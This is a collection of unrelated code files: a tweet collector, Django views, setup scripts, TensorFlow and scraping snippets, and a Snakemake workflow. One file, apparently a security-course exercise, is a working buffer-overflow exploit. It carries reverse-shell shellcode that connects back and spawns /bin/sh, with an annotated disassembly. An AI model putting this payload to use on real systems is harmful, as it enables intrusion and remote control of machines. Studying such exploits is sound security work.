image = self.get_image(req.turn_degrees)
image_msg = CvBridge().cv2_to_imgmsg(image)
return TurnCameraResponse(image_msg)
if __name__ == '__main__':
try:
rospy.init_node("turn_camera_service_node")
TurnCameraClass()
print("Turn Camera Service is Running")
rospy.spin()
except rospy.ROSInterruptException:
pass
|
996,116 | 4c07828e476bc9a8a5d40a0d822692acea37d451 | '''
Tweet_Collector
Collects tweets from the Twitter API using the StreamListener of the Tweepy library
Collected tweets are written to mongoDB
DB and API credentials are read from ./config.py people to follow are stored in ./infos.py
'''
import config
import infos
import pymongo
from tweepy import OAuthHandler, Stream
from tweepy.streaming import StreamListener
import json
import time
def organize_tweet(status):
'''
Extended tweets and retweets keep the original poster and the tweet body in different places of the tweet
This preprocessing function returns the original tweet text, and the original timestamp
Also returns whether it is retweeted and the retweeting user info
'''
if 'RT' not in status['text']:
retweet = False
rt_user = False
if (status['truncated'] == False):
tweet_text = status['text']
else:
tweet_text = status['extended_tweet']['full_text']
else:
try:
retweet = True
rt_user = status['retweeted_status']['user']['screen_name']
if (status['retweeted_status']['truncated'] == False):
tweet_text = status['retweeted_status']['text']
else:
tweet_text = status['retweeted_status']['extended_tweet']['full_text']
except:
retweet = False
rt_user = False
tweet_text = status['text']
return retweet, rt_user, tweet_text, status['created_at']
def authenticate():
"""
Handles tweeter API authentication. Credentials should be stored in ./config.py
"""
auth = OAuthHandler(config.TW_API_KEY, config.TW_API_SECRET)
auth.set_access_token(config.TW_ACC_TOKEN, config.TW_ACC_SECRET)
return auth
class MaxTweetsListener(StreamListener):
'''
Inherits from StreamListener
Defines on_connect, on_data, and on_error
for detailed usage instructions see https://docs.tweepy.org/en/v3.2.0/streaming_how_to.html
'''
def __init__(self, max_tweets, *args, **kwargs):
# initialize the StreamListener
super().__init__(*args, **kwargs)
# set the instance attributes
self.max_tweets = max_tweets
self.counter = 0
self.tweet_list = []
self.tweet_content = []
def on_connect(self):
'''
On successful connection
'''
print('connected. listening for incoming tweets')
def on_data(self, data):
"""
Processes Tweet when it is intercepted. The tweet is first preprocessed by organize_tweet()
Then the required info is pulled from the tweet and written to mongoDB
"""
status = json.loads(data)
# increase the counter
self.counter += 1
retweet, rt_user, tweet_text, created_time = organize_tweet(status)
if status['user']['id_str'] in infos.twitterids:
who = status['user']['id_str']
try:
replied_to = status['in_reply_to_screen_name']
except:
replied_to = 'NULL'
else:
who = status['user']['screen_name']
try:
replied_to = infos.twitterids[status['in_reply_to_user_id_str']]
except:
replied_to = 'NULL'
tweet = {
'id': status['user']['id_str'], #status.user.id_str,
'who': who,
'replied_to': replied_to,
'retweeted': retweet, #status['retweeted'], #status.retweeted,
'retweeted_from': rt_user,
'text': tweet_text,
'timestamp' : created_time
}
#write to mongoDB here
collection.insert_one(tweet)
print(f'New tweet arrived: {tweet["text"]}')
# check if we have enough tweets collected
if self.max_tweets == self.counter:
# reset the counter
self.counter=0
# return False to stop the listener
return False
def on_error(self, status):
if status == 420:
print(f'Rate limit applies. Stop the stream.')
return False
if __name__ == '__main__':
while True:
# Set mongoDB Connection and get the tweet.data collection
client = pymongo.MongoClient("mongodb")
db = client.tweets
collection = db.tweet_data
# Authenticate API connection and listen to tweets (maximum 100 tweets per 5 mins)
auth = authenticate()
listener = MaxTweetsListener(max_tweets=100)
stream = Stream(auth, listener)
# Filter the tweets to only the ones we are interested in
follow = list(infos.people.values())
stream.filter(follow=follow, languages=['en'], is_async=False)
time.sleep(60*5)
|
996,117 | 275ded3385a1bc619d5e60e92b974d7a7e2243ce | def add_tags(tag,word):
print("<%s>%s</%s>" %(tag, word, tag))
add_tags('i','Python')
add_tags('b','Python Tutorial') |
996,118 | bba7f9c03596d028c894871a0095ae942d2565b0 | """ SeismiPro is a library for seismic data processing. """
from setuptools import setup, find_packages
import re
with open('seismicpro/__init__.py', 'r') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
setup(
name='SeismicPro',
packages=find_packages(exclude=['tutorials', 'docker_containers', 'datasets', 'models']),
version=version,
url='https://github.com/gazprom-neft/SeismicPro',
license='Apache License 2.0',
author='Gazprom Neft DS team',
author_email='rhudor@gmail.com',
description='A framework for seismic data processing',
long_description='',
zip_safe=False,
platforms='any',
include_package_data=True,
package_data={'': ['datasets/demo_data/*.sgy']},
install_requires=[
'matplotlib>=3.3.1',
'numba>=0.52.0',
'numpy>=1.19.5',
'pandas>=1.1.5',
'scikit-learn>=0.23.2',
'scipy>=1.5.2',
'segyio>=1.9.5',
'tdigest>=0.5.2.2',
'tqdm>=4.56.0',
'batchflow @ git+https://github.com/analysiscenter/batchflow.git@9823f369#egg=batchflow',
],
extras_require={
'torch': ['torch>=1.7'],
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Scientific/Engineering',
],
)
|
996,119 | b2382ae9b0c8e9482f8a6d026108f29b58fd8524 | from django.http import HttpResponse,HttpResponseRedirect
from django.core.context_processors import csrf
from django.template import Context, loader
from django.shortcuts import render_to_response,render
from .forms import *
from .models import *
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
def index(request):
template = loader.get_template('pages/login.html')
return HttpResponse(template.render('hola'))
def pages(request):
template = loader.get_template('pages/index.html')
return HttpResponse(template.render('hola'))
def tables(request):
template = loader.get_template('pages/tables.html')
return HttpResponse(template.render('hola'))
def forms(request):
template = loader.get_template('pages/forms.html')
return HttpResponse(template.render('hola'))
def flot(request):
template = loader.get_template('pages/flot.html')
return HttpResponse(template.render('hola'))
def morris(request):
template = loader.get_template('pages/morris.html')
return HttpResponse(template.render('hola'))
def panelswells(request):
template = loader.get_template('pages/panels-wells.html')
return HttpResponse(template.render('hola'))
def buttons(request):
template = loader.get_template('pages/buttons.html')
return HttpResponse(template.render('hola'))
def notifications(request):
template = loader.get_template('pages/notifications.html')
return HttpResponse(template.render('hola'))
def typography(request):
template = loader.get_template('pages/typography.html')
return HttpResponse(template.render('hola'))
def icons(request):
template = loader.get_template('pages/icons.html')
return HttpResponse(template.render('hola'))
def grid(request):
template = loader.get_template('pages/grid.html')
return HttpResponse(template.render('hola'))
def blank(request):
template = loader.get_template('pages/blank.html')
return HttpResponse(template.render('hola'))
def thanks(request):
template = loader.get_template('pages/blank.html')
return HttpResponse(template.render('Gracias por su formulario'))
@login_required
def estacion(request):
station_list = Estacione.objects.all()
po_list = PO.objects.all()
contratista_list = Contratista.objects.all()
return render_to_response(
'estacion.html',
{'station_list': station_list,'po_list': po_list,'contratista_list': contratista_list,}
)
def get_name(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = ContactForm(request.POST)
# check whether it's valid:
if form.is_valid():
subject = form.cleaned_data['subject']
message = form.cleaned_data['message']
sender = form.cleaned_data['sender']
cc_myself = form.cleaned_data['cc_myself']
recipients = ['info@example.com']
if cc_myself:
recipients.append(sender)
send_mail(subject, message, sender, recipients)
return HttpResponseRedirect('/thanks/')
# if a GET (or any other method) we'll create a blank form
else:
form = ContactForm()
return render(request, 'name.html', {'form': form}) |
996,120 | e6e77998d74fc5f60e65407436515d16b2b5a8a5 | import tensorflow as tf
if __name__ =='__main__':
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
sess = tf.Session()
print(sess.run(adder_node, feed_dict = {a:3,b:4.5}))
print(sess.run(adder_node, feed_dict = {a:[1,3],b:[2,4]}))
|
996,121 | 87dbd162533d8b8971dd2f7b0606ce3d46cd64e4 | import bs4
from bs4 import BeautifulSoup
import requests
# this url does not work due to react
# URL = "https://www.empireonline.com/movies/features/best-movies-2/"
URL = "http://web.archive.org/web/20200322005914/https://www.empireonline.com/movies/features/best-movies-2/"
INPUT_FILENAME = "movies.html"
OUTPUT_FILENAME = "movies.txt"
def get_webpage(url):
#
# get webpage as text
#
response = requests.get(url)
webpage = response.text
return webpage
def save_webpage(filename, webpage):
#
# save webpage to file
#
with open(filename, "w") as fp:
fp.write(webpage)
def load_webpage(filename):
#
# load webpage from file
#
with open(filename) as fp:
webpage = fp.read()
return webpage
try:
#
# if file exist, already downloaded, goto else:
#
with open(INPUT_FILENAME) as fp:
pass
except FileNotFoundError:
print(f"{INPUT_FILENAME} does not exists")
print(f"downloading {URL}...")
webpage = get_webpage(URL)
print(f"saving {URL} to {INPUT_FILENAME}...")
save_webpage(INPUT_FILENAME, webpage)
else:
print(f"{INPUT_FILENAME} exists")
print(f"loading {URL} from {INPUT_FILENAME}...")
webpage = load_webpage(INPUT_FILENAME)
finally:
pass
# print(webpage)
soup = BeautifulSoup(webpage, "html.parser")
h3s = soup.find_all(name="h3", class_="title")
h3s_inverted = h3s[::-1]
#
# or
#
h3s.reverse()
h3: bs4.Tag
movies = [h3.getText() for h3 in h3s_inverted]
print(f"Creating {OUTPUT_FILENAME}")
with open(OUTPUT_FILENAME, "w", encoding="utf-8") as fp:
fp.write("\n".join(movies))
|
996,122 | 2aef7c34293d2dae222ef84c42510a55425544e8 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from PIL import Image
import numpy as np
import tensorflow as tf
def load_graph(model_file):
graph = tf.Graph()
graph_def = tf.GraphDef()
with open(model_file, "rb") as f:
graph_def.ParseFromString(f.read())
with graph.as_default():
tf.import_graph_def(graph_def)
return graph
graph = load_graph("faceorplace/output_graph.pb")
labels = ["place", "face"]
input_operation = graph.get_operation_by_name("import/DecodeJpeg")
output_operation = graph.get_operation_by_name("import/final_result")
sess = tf.Session(graph=graph)
def fun_prediction_graph(image_ndarray):
results = sess.run(output_operation.outputs[0],
{input_operation.outputs[0]: image_ndarray})
results = np.squeeze(results)
return results.argmax()
def make_prediction(file_name):
image = Image.open(file_name)
image_ndarray = np.array(image)[:, :, 0:3]
x, y = (list(image_ndarray.shape)[0:2])
pred = fun_prediction_graph(image_ndarray)
# doing a close-up and checking for the face again
pred_closeup = fun_prediction_graph(
image_ndarray[int(x / 4 * 1):int(x / 4 * 3), int(y / 4 * 1):int(y / 4 * 3), :])
# if either at close-up or at full-sieze the face is detected, return "face"
return labels[pred or pred_closeup]
# initialise the graph so the first prediction happens faster
make_prediction("faceorplace/static/faces/face1.png")
|
996,123 | b9610f2720661f9717356596bc9bcbcffe3e98e7 | from shellcode import shellcode
from struct import pack
# EBP = 0xbffef238
ret_address = 0xbffef23c # EBP + 4
buf_address = 0xbffeea28
# 0x08048ef8 <+24>: lea -0x810(%ebp),%eax
# so buf_address: EBP - 0x810 = 0xbffeea28
# my_sc_code = '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x01' + '\x31\xc9' + \
# '\x51' + '\x83\xc1\x01' + '\x51' + '\x83\xc1\x01' + '\x51' +'\x89\xe1' + \
# '\x31\xd2' +'\xcd\x80' + '\x89\xc6'+ \
# '\x31\xc9' + \
# '\x66\x81\xc1\x00\x01' + \
# '\xc1\xe1\x10' + '\x80\xc1\x7f' + \
# '\x51' + '\x66\x68\x7a\x69' + '\x31\xdb' + \
# '\xb3\x02' + '\x66\x53' + '\x89\xe7' + '\x6a\x10' + '\x57' + '\x56' + \
# '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x03' + '\x89\xe1' + '\xcd\x80' + \
# '\x31\xc0' + '\xb0\x3f' + '\x89\xf3' + '\x31\xc9' + '\xcd\x80' + '\xb0\x3f' + \
# '\x83\xc1\x01' + '\xcd\x80' + '\xb0\x3f' + '\x83\xc1\x01' + '\xcd\x80'
#
# my_sc_code = '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x01' + '\x31\xc9' + \
# '\x51' + '\x83\xc1\x01' + '\x51' + '\x83\xc1\x01' + '\x51' +'\x89\xe1' + \
# '\x31\xd2' +'\xcd\x80' + '\x89\xc6' + '\x31\xc9' + \
# '\x89\x0d\x80\xff\xff\xfe' + \
# '\xf7\xd1' + \
# '\x51' + '\x66\x68\x7a\x69' + '\x31\xdb' + \
# '\xb3\x02' + '\x66\x53' + '\x89\xe7' + '\x6a\x10' + '\x57' + '\x56' + \
# '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x03' + '\x89\xe1' + '\xcd\x80' + \
# '\x31\xc0' + '\xb0\x3f' + '\x89\xf3' + '\x31\xc9' + '\xcd\x80' + '\xb0\x3f' + \
# '\x83\xc1\x01' + '\xcd\x80' + '\xb0\x3f' + '\x83\xc1\x01' + '\xcd\x80'
#
# my_sc_code = '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x01' + '\x31\xc9' + \
# '\x51' + '\x83\xc1\x01' + '\x51' + '\x83\xc1\x01' + '\x51' +'\x89\xe1' + \
# '\x31\xd2' +'\xcd\x80' + '\x89\xc6'+ \
# '\x31\xc9' + \
# '\x66\x81\xc1\x43\x44' + \
# '\xc1\xe1\x10' + \
# '\x66\xb9\x41\x42' + \
# '\x51' + '\x66\x68\x7a\x69' + '\x31\xdb' + \
# '\xb3\x02' + '\x66\x53' + '\x89\xe7' + '\x6a\x10' + '\x57' + '\x56' + \
# '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x03' + '\x89\xe1' + '\xcd\x80' + \
# '\x31\xc0' + '\xb0\x3f' + '\x89\xf3' + '\x31\xc9' + '\xcd\x80' + '\xb0\x3f' + \
# '\x83\xc1\x01' + '\xcd\x80' + '\xb0\x3f' + '\x83\xc1\x01' + '\xcd\x80'
my_sc_code=("\xba\xf4\xf1\xfe\xbf\x88\x02\x42\x88\x02\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68\x7f\x01\x01\x01\x66\x68\x7a\x69\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80")
print my_sc_code + '\x90'*1907 + pack("<I",buf_address) + pack("<I",ret_address)
#
# print len(shellcode)
# print len(my_sc_code)
# print my_sc_code + shellcode + '\x90'*1933 + pack("<I",buf_address) + pack("<I",ret_address)
# print my_sc_code + shellcode + '\x90'*1912 + pack("<I",buf_address) + pack("<I",ret_address)
## Annotated disassembly:
"""
xorl %eax, %eax
# fixing null byte on IP
mov $0xaaaaaaaa,%edx
mov %al,(%edx)
inc %edx
mov %al,(%edx)
# call socket() routine
# init args for socket(int domain, int type, int protocol)
# domain = 2 (AF_INET) type=1 (SOCK_STREAM), protocol= TCP
xorl %ebx, %ebx
xorl %ecx, %ecx
pushl %ecx
movb $6, %cl # PROTOCOL = TCP
pushl %ecx
movb $1, %cl
pushl %ecx
movb $2, %cl # AF_INET = 2
pushl %ecx
movl %esp, %ecx
movb $1, %bl # SYS_SOCKET = 1
movb $102, %al # call SYS_socketcall
int $0x80
# init for connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
movl %eax, %edx
xorl %eax, %eax
xorl %ecx, %ecx
pushl %ecx
pushl %ecx
pushl $0x44434241 # IP
# For port
pushw $07a69
movb $0x02, %cl
pushw %cx
movl %esp, %edi
movb $16, %bl
pushl %ebx
pushl %edi
pushl %edx
movl %esp, %ecx
movb $3, %bl
movb $102, %al
int $0x80
xorl %ecx, %ecx
cmpl %eax, %ecx
je good # try jump to binding
# if not connected successfully, try to exit
xorl %eax, %eax
movb $1, %al
int $0x80
# binds socket to IO
good:
xorl %eax, %eax
movb $63, %al
movl %edx, %ebx
int $0x80
xorl %eax, %eax
movb $63, %al
movl %edx, %ebx
movb $1, %cl
int $0x80
xorl %eax, %eax
movb $63, %al
movl %edx, %ebx
movb $2, %cl
int $0x80
# run shell
xorl %eax, %eax
xorl %edx, %edx
pushl %eax
pushl $0x68732f6e
pushl $0x69622f2f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
movb $11, %al
int $0x80
xorl %eax, %eax
movb $1, %al
int $0x80
"""
|
996,124 | c64e4331650ff452777c2ba851a695fbc237a1a9 | num,lim=[int(x) for x in input().split()]
for val in range(num+1,lim):
if(val%2==0):
print(val)
|
996,125 | d2e1533850e3a7016f8a34a8e5cfbf1896446020 | from rest_framework import generics
from rest_framework.filters import SearchFilter
from service.serializers import MagazineDetailSerializer, MagazineListSerializer
from service.utils import MagazineMixin
class MagazineCreateView(MagazineMixin, generics.CreateAPIView):
serializer_class = MagazineDetailSerializer
class MagazineListView(MagazineMixin, generics.ListAPIView):
serializer_class = MagazineListSerializer
filter_backends = [SearchFilter]
search_fields = ['magazine']
class MagazineDetailView(MagazineMixin, generics.RetrieveUpdateDestroyAPIView):
serializer_class = MagazineDetailSerializer
|
996,126 | 806354c669b65d85dbf14940974865663d570c4c | import requests, json
from application import app
def getWeChatInfoByCode(code):
url = "https://api.weixin.qq.com/sns/jscode2session?appid={0}&secret={1}&js_code={2}&grant_type=authorization_code" \
.format(app.config['MINA_APP']['appid'], app.config['MINA_APP']['appkey'], code)
r = requests.get(url)
res = json.loads(r.text)
openid, session_key, unionid = None, None, None
session_key = None
if 'openid' in res:
openid = res['openid']
if 'session_key' in res:
session_key = res['session_key']
if 'unionid' in res:
unionid = res['unionid']
return openid, session_key, unionid |
996,127 | 3ebf46a2af0fc212f5a223e080ae9d634b9ef8fd | '''
给定两个整数 n 和 k,返回 1 ... n 中所有可能的 k 个数的组合。
示例:
输入: n = 4, k = 2
输出:
[
[2,4],
[3,4],
[2,3],
[1,2],
[1,3],
[1,4],
]
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/combinations
'''
from itertools import combinations
class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
return list(combinations(list(range(1,n+1)),k)) |
996,128 | 04b54a3c6660b5e4659bd1dac8a9b534e052eb76 | def gen(l):
for li in l:
if type(li) == type('a'):
yield 'string'
elif type(li) == type(1):
yield 'numeric'
else:
yield 'uh..'
mylist = ['a', 1, 'b' ,12]
for li in gen(mylist):
print li
|
996,129 | d7fc92de8d08c84b36d5a2fc5f47240af29e213c | # -*- coding:utf-8 -*-
# Author: Golion
# Date: 2016.2
import sys
import web
web.config.debug = False
urls = (
'/(.*)', 'controller.Controller'
)
app = web.application(urls, globals(), autoreload=False)
application = app.wsgifunc()
|
996,130 | 8296e3bd015718ccda489d233735fa240d7bd62a | #!/usr/bin/python3
import urllib.request as urllib
import re
frm = "abcdefghijklmnopqrstuvwxyz"
to = "cdefghijklmnopqrstuvwxyzab"
trans_table = str.maketrans(frm,to)
useUrl = "http://www.pythonchallenge.com/pc/def/map.html"
data = urllib.urlopen(useUrl)
codec = data.info().get_param("charset","utf-8")
text = data.read().decode(codec)
test = "".join(re.findall('<font color="#f000f0">(.+?)</tr>',text, re.DOTALL))
print(test.translate(trans_table))
print(useUrl.translate(trans_table))
|
996,131 | 9a336a0a88caf6b94548c0d0483e2d7d4b83717a | # -*- coding:utf-8 -*-
import datetime
from util.mysqlHelper import MysqlHelper
from config import config
from report import generate_report
db = MysqlHelper(config.db_ip, config.db_user, config.db_password, config.database, config.db_port)
class Model:
def __init__(self, table, amount, range_count, range_percentile, sql, total_dbid):
self.table = table
self.amount = amount
self.range_count = range_count
self.range_percentile = range_percentile
self.sql = sql
self.total_dbid = total_dbid
def analyse_db():
analyse_results = []
for table in config.tables:
sql = config.sql % (config.database, table)
print datetime.datetime.now(), ' Start Query DB: ' + sql
results = db.query(sql)
print datetime.datetime.now(), ' Start Analyse'
total_dbid = float(len(results))
amount = 0
count = []
for item in results:
count.append(int(item[0]))
range_count = {'r0': 0, 'r1': 0, 'r2': 0, 'r3': 0, 'r4': 0, 'r5': 0, 'r6': 0, 'r7': 0, 'r8': 0, 'r9': 0, 'r10': 0}
for item in count:
amount += item
if item <= 500:
range_count['r0'] += 1
elif 500 < item <= 1000:
range_count['r1'] += 1
elif 1000 < item <= 5000:
range_count['r2'] += 1
elif 5000 < item <= 10000:
range_count['r3'] += 1
elif 10000 < item <= 50000:
range_count['r4'] += 1
elif 50000 < item <= 100000:
range_count['r5'] += 1
elif 100000 < item <= 500000:
range_count['r6'] += 1
elif 500000 < item <= 1000000:
range_count['r7'] += 1
elif 1000000 < item <= 5000000:
range_count['r8'] += 1
elif 5000000 < item <= 10000000:
range_count['r9'] += 1
else:
range_count['r10'] += 1
range_percentile = {'r0p': 0, 'r1p': 0, 'r2p': 0, 'r3p': 0, 'r4p': 0, 'r5p': 0, 'r6p': 0,
'r7p': 0, 'r8p': 0, 'r9p': 0, 'r10p': 0, 'r11p': 0}
if range_count['r0']:
range_percentile['r0p'] = '%0.3f' % float(range_count['r0']*100/total_dbid)
if range_count['r1']:
range_percentile['r1p'] = '%0.3f' % float(range_count['r1']*100/total_dbid)
if range_count['r2']:
range_percentile['r2p'] = '%0.3f' % float(range_count['r2']*100/total_dbid)
if range_count['r3']:
range_percentile['r3p'] = '%0.3f' % float(range_count['r3']*100/total_dbid)
if range_count['r4']:
range_percentile['r4p'] = '%0.3f' % float(range_count['r4']*100/total_dbid)
if range_count['r5']:
range_percentile['r5p'] = '%0.3f' % float(range_count['r5']*100/total_dbid)
if range_count['r6']:
range_percentile['r6p'] = '%0.3f' % float(range_count['r6']*100/total_dbid)
if range_count['r7']:
range_percentile['r7p'] = '%0.3f' % float(range_count['r7']*100/total_dbid)
if range_count['r8']:
range_percentile['r8p'] = '%0.3f' % float(range_count['r8']*100/total_dbid)
if range_count['r9']:
range_percentile['r9p'] = '%0.3f' % float(range_count['r9']*100/total_dbid)
if range_count['r10']:
range_percentile['r10p'] = '%0.3f' % float(range_count['r10']*100/total_dbid)
analyse_results.append(Model(table, amount, range_count, range_percentile, sql, total_dbid))
print datetime.datetime.now(), ' End'
return analyse_results
if __name__ == '__main__':
generate_report(analyse_db())
db.close()
|
996,132 | 0113680ddf4435c1e7f592de2813d457b19493f5 | # Generated by Django 2.1 on 2019-04-28 18:23
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('members', '0011_auto_20190427_0128'),
]
operations = [
migrations.CreateModel(
name='Cashback',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('amount', models.DecimalField(decimal_places=4, help_text='Amount Requested', max_digits=19, verbose_name='Amount')),
('paid_out', models.BooleanField(default=False, help_text='Paid out?', verbose_name='Paid out')),
],
options={
'verbose_name': 'Cash back request',
'verbose_name_plural': 'Cash back requests',
},
),
migrations.AlterField(
model_name='member',
name='user_account',
field=models.OneToOneField(blank=True, editable=False, help_text='User account.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='record', to=settings.AUTH_USER_MODEL, verbose_name='User account'),
),
migrations.AddField(
model_name='cashback',
name='member',
field=models.ForeignKey(help_text='Member reference.', on_delete=django.db.models.deletion.CASCADE, related_name='cashback_records', to='members.Member', verbose_name='Member'),
),
]
|
996,133 | 8ff266731816df820a6a5b9821adc3c01cf79916 | import torch
import torch.nn as nn
class Generator(nn.Module):
def __init__(self, nz, ngf, nc, dropout_rate):
super(Generator, self).__init__()
self.main = nn.Sequential(
# input is Z, going into a convolution
nn.ConvTranspose2d(nz, ngf * 32, kernel_size=4, stride=1, padding=0, bias=True),
nn.BatchNorm2d(ngf * 32),
nn.LeakyReLU(0.01, inplace=True),
# state size. (ngf*32) x 4 x 4
nn.ConvTranspose2d(ngf * 32, ngf * 16, kernel_size=4, stride=2, padding=1, bias=True),
nn.BatchNorm2d(ngf * 16),
nn.Dropout2d(p=dropout_rate, inplace=True),
nn.LeakyReLU(0.01, inplace=True),
# state size. (ngf*16) x 8 x 8
nn.ConvTranspose2d(ngf * 16, ngf * 8, kernel_size=4, stride=2, padding=1, bias=True),
nn.BatchNorm2d(ngf * 8),
nn.Dropout2d(p=dropout_rate, inplace=True),
nn.LeakyReLU(0.01, inplace=True),
# state size. (ngf*8) x 16 x 16
nn.ConvTranspose2d(ngf * 8, ngf * 4, kernel_size=4, stride=2, padding=1, bias=True),
nn.BatchNorm2d(ngf * 4),
nn.Dropout2d(p=dropout_rate, inplace=True),
nn.LeakyReLU(0.01, inplace=True),
# state size. (ngf*4) x 32 x 32
nn.ConvTranspose2d(ngf * 4, ngf * 2, kernel_size=4, stride=2, padding=1, bias=True),
nn.BatchNorm2d(ngf * 2),
nn.Dropout2d(p=dropout_rate, inplace=True),
nn.LeakyReLU(0.01, inplace=True),
# state size. (ngf*2) x 64 x 64
nn.ConvTranspose2d(ngf * 2, ngf, kernel_size=4, stride=2, padding=1, bias=True),
nn.BatchNorm2d(ngf),
nn.Dropout2d(p=dropout_rate, inplace=True),
nn.LeakyReLU(0.01, inplace=True),
# state size. (ngf) x 128 x 128
nn.ConvTranspose2d(ngf, nc, kernel_size=4, stride=2, padding=1, bias=True),
nn.Tanh()
# state size. (nc) x 256 x 256
)
def forward(self, input):
return self.main(input) |
996,134 | adc98f82256214a01e7232618700e837426585b5 | MMSEQS2 = config.get('MMSEQS2', 'mmseqs')
mmseqs2_base_all = expand('reports/{sample}.mmseqs2.{{db}}.tsv', sample=samples_all)
MMSEQS2_ALL = expand(mmseqs2_base_all, db=['nr', 'refseqc'])
rule mmseqs2_all:
input: MMSEQS2_ALL
MMSEQS2_FASTA_ALL = expand('reports/{sample}.mmseqs2.{db}.tsv', sample=samples_fasta, db=['nr', 'refseqc'])
rule mmseqs2_fasta_all:
input: MMSEQS2_FASTA_ALL
rule mmseqs2_refseqc_all:
input: expand(mmseqs2_base_all, db='refseqc')
rule mmseqs2_nr_all:
input: expand(mmseqs2_base_all, db='nr')
MMSEQS2_BENCHMARK_ALL = expand('benchmark/{sample}/mmseqs2.refseqc.tsv', sample=benchmark_samples_all)
rule mmseqs2_benchmark_all:
input: MMSEQS2_BENCHMARK_ALL
def mmseqs2_db(wildcards):
if wildcards.db == 'refseqc':
return config['MMSEQS2_REFSEQC_DB']
elif wildcards.db == 'nr':
return config['MMSEQS2_NR_DB']
else:
raise Exception
def mmseqs2_tsv(wildcards):
db = mmseqs2_db(wildcards)
return db[:-3] + '.tsv'
MMSEQS2_SHELL = '''
/usr/bin/time -v -o {log.time} \
{MMSEQS2} createdb {input} {params.query_db} 2>&1 | tee {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} taxonomy {params.query_db} {params.db} {params.db_tsv} {TAXONOMY_DB} {params.query_lca_db} {TMPDIR} 2>&1 | tee -a {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} createtsv {params.query_db} {params.query_lca_db} {params.query_lca_tsv} 2>&1 | tee -a {log.log}
{PIGZ} -9 {params.query_lca_tsv}
mv {params.query_lca_tsv}.gz {output.reads}
# MMseqs doesn't automatically delete tmp workdir to cache run progress
rm -r $(readlink -f {TMPDIR}/latest) {TMPDIR}/latest
'''
MMSEQS2_NEW_SHELL = '''
/usr/bin/time -v -o {log.time} \
{MMSEQS2} createdb {input} {params.query_db} 2>&1 | tee {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} taxonomy {params.query_db} {params.db} {params.db_tsv} {params.query_lca_db} {TMPDIR} 2>&1 | tee -a {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} createtsv {params.query_db} {params.query_lca_db} {params.query_lca_tsv} 2>&1 | tee -a {log.log}
{MMSEQS2} taxonomyreport {params.db} {params.query_lca_db} taxonomy.report 2>&1 | tee -a {log.log}
{PIGZ} -9 {params.query_lca_tsv} > {output.reads}
# MMseqs doesn't automatically delete tmp workdir to cache run progress
rm -r $(readlink -f {TMPDIR}/latest) {TMPDIR}/latest
'''
rule mmseqs2:
input: fastx_both_input
output: reads='data/{seq}.mmseqs2.{db}.tsv.gz'
log: log='log/mmseqs2/{seq}.{db}.log',
time='time/mmseqs2/{seq}.{db}.log'
params: db=mmseqs2_db,
db_tsv=mmseqs2_tsv,
query_db='queryDB',
query_lca_db='queryLcaDB',
query_lca_tsv='queryLca.tsv'
shadow: 'shallow'
threads: ALL_CORES
resources: mem=190
shell:
MMSEQS2_SHELL
rule mmseqs2_benchmark:
input: fastx_both_input
output: reads='benchmark/data/{seq}.mmseqs2.{db}.tsv.gz'
log: log='benchmark/log/mmseqs2/{seq}.{db}.log',
time='benchmark/time/mmseqs2/{seq}.{db}.log'
params: db=mmseqs2_db,
